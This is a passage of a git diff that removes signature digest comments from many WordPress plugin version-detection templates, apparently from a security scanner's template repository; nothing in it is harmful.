490a0046304402205378b52cdab37579ff27892a234c5bf4311a751a8e0cc7786be075e2d49f97c202204e95fbe746e4e38376c369f856eba4cf751f9d258381c6bf83768dfcbd624396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 804d27d14a..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205979aeb51f3f0ecb2a57ca3e3954c8e935719e94f52bef67073207b73cc1af21022100bbe5eaf1e02f67b19c1c65e22aa60434e015439f2df6731f5c0883470b14fd74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index ab9b93db51..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204aeb8edb23f9d884e49723c2c12a2e382b0a9ee91bd6fa3f174438a94cd166b80221008433d667cbe70756019d3ccee1de310496bd09f5c176641efc8fa2690161da58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 1f62778a08..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9a45e9259b1c1c90b877674fb76552ab489db868ff4896d9403781418fe5b31022100ab5463b0dcf7b8917db496e1bd6ae6528971d225b87b583efe3b5c13ff6656e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 015f040bd1..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200db7662786b45216df640d83f7607b0eff7c3f87451d082ac5ee6a86f1e9681b02201e705960478a606a9d49bff801220d59366ccc492013541102f28ea558a503ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 5d17e02c09..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009fda733658b143cc0b9423c62507d73d359089d1d05e0a4f69bb371e99f109b9022100a6782b224afe461c3e5c0e0050f361fddeecddd3b2ef98bc32e0c0eb6397901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index f240ad73f4..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081fd580a03209f9702cdf2777bfccaaa1cca429cb813789e0dd9026fcf3a9b50022046ad4afc9bcce1d9dcf254a2a8ed49ce2e68138820f962f5ad1e0dda71e8ac6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 663dc481da..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066034e700a7544c53b095c28edac79f025c260e7445f91f0db0a23bac6847f21022100caf9ec6bfb809dfd8753be6496cd45c69a64c7cc821a4fb835469cbe71e30658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 1a9acb6688..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022065a6caee86cfca0221f759ad7e8636c452ee037d726aec1c499a82b29cda1603022034229ca6c489efe5e7a7dc89fcf71f0c189472c13cb35240a1edcfbf7f71abd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 4fb04890c0..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009352404f0224eeb5213fa7bdb545ae1abdc9bf6509648a1356a51647826ac6ef02201d9dbbacf0f5e5981495a004be10770fcd51bc3d7f3a38c70f04e00621662fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 1191f33435..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220591ed476e51d21a298f4da5a05f68c69afda3769829b1124dc8efbf7fd468037022100b90c2db13b556eed1d4a9bcb481e75121dc7baeb9bfbde968f1cb52fd6406853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 50b28a07a7..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ffcbcbc23df3dd0cf0cbbe65d55b25797c68a9de2c2e02c0d4e582ee184508c02205f51e32562696722cbb0e11cc2d925d6199dbe04c94eaa2e6e4ab7681c9e4473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index b68f3c6b1b..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073acfe30f6aead1fcc6222b40368b70be776ebc762b969373f825da301554b9f02207258935e42e694131218ff248fda35277ba2467c3370daa0e05110a340e9a7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d6918c5182..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c83feb4d8f873e1f7cf95fdfe5e39fb6b67b50e40cf9dff594194f5ab4974b290220767018ecd911d25413c56b53939491af618c4873de61b4e073917f8e33b97059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e24587c0ef..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c2654e240bcaeeae276ad15ff615531bca46cd1ea4d54d399d321be440e9451022071730a809e57cbbffff49ce933bf00f16b72e9c134c2e792e35dc38968d27a13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 28e0101474..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024e2694c5a1a66cbd896c705f1dc26b8cd7f03cbea605ba774a23e9f84804f63022100be5ffbaf499ee6cb1007c52b1f4b73a4c337d02b9c0a56d44b8cc90bb4cfd9c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d449df85c5..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041de198160acc8c042594c03433d4866eb3a92375a5984515e554d8928bea60802207f01c478175a8bec523b7ab58107a12f3a33f76e77601d65ef991fe1fa65ddd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index f091a96f21..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a02b896695fbef840656df2d64782b3a7d2137378183412a72598edc8dbb39702205b651f7493bd36452784e31462ac0e7d52427d153211408a9f0b0844ab2b8136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index b905568aef..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220182c2b94b7533144e44e74e49ee81b207917dc2c1b9674efdb4546deb263c7df022100cdaf556009ef7f8fdfa2cd8431cd1131e504e3c391197c15b58a5ac9a2bd566d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 94e55e32ec..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e24448fc2affca3e1c4e82efdbccf4830d6a6501d3b4562e0f8bfbf892007a3e022058eaa66181af348d197c5f01f27accc4b216c71a0335ba2075b9c628faa6a432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index ac49e20d3b..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe96d5e8d78514327251368765a693d4c7244d25fd7b0705c7387a972749c23d022100840269efc452859647dd6cac29981ba4976340424a3055836dc4463315a38386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index d16d1bab1c..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100981c7a2133d9cf5685212331163c3c52f70d661bc9c276cef5fff38c89eec2610220719fab0b113caf09ecc526968237a1a92edc6a29cb9dc26f8ec5311adcdb53cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 54e7897ca4..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220290036bba831f55ac356701066ddef6ea76c5a0fc5d8212c07e9fb09c621212802202e9f1ace31502d7e6f7acbef9123d7e8b91dd0cd0e2bd54fdf37b7d7573621ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 8979f6097a..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035686b9cbc0d9779d38a1ae6e6f70b763b76194d5ba4899d1c3c39cec3c9657702206b4bd980d112989f5baf3536936c974694b661b4282a947e7892119b0e86ed1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 6223e2b1dc..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201cbb034f65e784e6151ce2cb60996d62d482b5493808856e117d73482e9448cd02204f6d37996f827bdaa8b8a825f76cd4f39d52b42ad3851b1d5f89145454940cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index f264f463b5..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c461fbad6224cd2e79684aa4c7696bb613cd66e824ced0826cf59df1d6ea31d02203c34dd350830ead087319b872f7e22d6f710bf84a48ab01f0c8abdb8cacb405c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 85be79041c..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100886757c2c4be03a6140ecf9c615adc7aaa39cb31aa68f6a2c92f667411f51757022100b38724cce6025d80669a11bdb77cba2da074716a5fbdeb6dea91f1029f778203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index dd5cbbda37..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca51742238920118970fa037f940c18b408982481f14171d862a3c0bb0efd67402205a1cf526e03edeeca23802ada9479f7e84bbd13b77e698e4c616d10c81e72de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 0b5e065862..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bbbd9abcec54004cdeed5a81c9e5cd667a01ba8591acc3a8d57b4e20e5177d71022100df74c211222d8f78aca4ee1e6b3b89b5cc22d8e8601e713e8a86af7483a7b63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 103e0b6ea9..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de339b27c1381daf28c5b939c3042a0c1308580437bb0d8491d32efb159832ab02204e47729fee872211f7c88f10a39dc52dfad6f5c573a3ac58c7bca38cb8b9f328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 4f6de9f676..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220311a16cf89553300f6b812b55a2db3098a576c40f2dcd84a64a2705e602235d002203d7d5f209b954ff0eef002fb848d9354d1425bd75a4c3e37d6f00c839d91b973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 31dd7378a1..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068f3d2f90114640c9b28fd3ace271568f835262b2be5458c668e4731536b1780022035c03a1c9d918078a8f5e684366adb7eeb6c78dc9a30423ef4576c162b5f57b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 906b734d43..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c193cecb945bddd56644805a1b4496f112e0b96ae2dd14fb4b1d2b3a79e911a602205e233f9cc99c085ca3aad58cad4d82eab17ae5235b0b6da8659551027cbe4d90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 17a89b4c3a..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206962da53b622985737ebd6f4344da10f8ab8965c8523f56c3d0364fb027f0d0002201e9d3c61783593e0f3d871763c84d7ccae9077966b2f5eeea96452c27c6fdb67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 8c5a26a3b9..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207266a14b82584e2bdce1bb28f9613523e387bd2d529197fed3080aaa0ab29155022100cbbf71d0b5b5cb6902036f88fadbb1fb8658846194a8d3854b62f763b2aa164f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 7b34074df9..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8e511c2a27fa56470c40337a9c2b40ea13bc8aa4ce6026b97ee358480d3f71a02204775a1de76712044d665ce897427bbfd1fd85d4ebee3653834d81720736acca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5bb3a809af..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e79460149f2efa73b3237e7c20db78a918e6b2a8832d1ec65da6ca5158f9735022022b60aa0f0d8143684c6bd49f034149f9a0c6b82547ecc65e1354ca9b38582ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 96faf84ecc..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf3372837f9c56f657ae6253f73e79df9609fe5a33615af26cc9057e107f69ab022100c2ff199e77d5a04ce1b464cc412df904188d2a0f23711e6717dba0be71da17e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 421738b597..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a2989753cde506f38abaf6ca4eec4290c6d0ae49775adc3c736e615e6c0b7721022100e47da083ffd0fdce39a527ebc758f9956c0e292ae09733f499b08863b74db87a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index f1dee41315..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220460f61d9a542d60583b21b1556844392811f18b675c37c3b2c28162f75243807022036bf6a515dc26e5292a0d2011c6155f1abf46882239773f6589576c9ad90a278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 00495b4fad..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7365018b1f6f5969cdfb0e1c0dcbbe9d0e80a5685d4701de45379468ab2a10d022057b0deabe402137e39f6c04eb355ded7a5da1fc8a210e6e24aeff759a13048aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 3290537c0b..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c783c01507c60e0c0c7a9cc81422038ea5a769b5fe050c305f0810e95db659e20221009889fc74a90a1be24ed9779d7b497b2489bcf5c7e94388442f040ed386f027a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index ead6a2d81f..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cbbae6c71ab377e4857fb614df1745c7d36d00a5eaeebedd94bf89026a2b62a022100b6e1d42348061d0b0b04e421741b24fadfd2627951439ba28fb111d04446b475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e3bcfc7eab..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207653c380b5dff639dc18f7265dd4e6c98c584b90fbd77207aef00bf37fa1ca670220116a065c47b2b81a53dce4eaed7b61958f78c6338ef91a1f3b9600f993c23486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 213b8e42ee..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9f27d5823714588ee81c5cb68b22e0435e8a20bc11967de5c4ac6ece838fadc02202cd2e2649cb444515f296c34f32deac99ceaad1c12a83fa46985880e667f501b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index add7a0960c..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7df1d405d363bbd5708b905253f1c5a8858b6afe547ac3deb39b7b52f66492c0220135129e2650cf77e84d05b9004dc135ae98d3ebb422dff33bc2aa808392e87b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 9655702863..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0dcb9a8b8e309b6a44996cdf66c7bb2335ff353d560a10174e113638b0c119f02200423efb2848d4a981ae15fc46e7831af33fd114a5146d8800c2c1c955bf6acfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 60a6891245..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220214d0825e24a9eb22af962b981363eb6edfabf0d660630290647647815a9bce7022016e457ada42eac12ab704212a4871d0cc06e8a69ee0ba797ce510b68d30e898b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 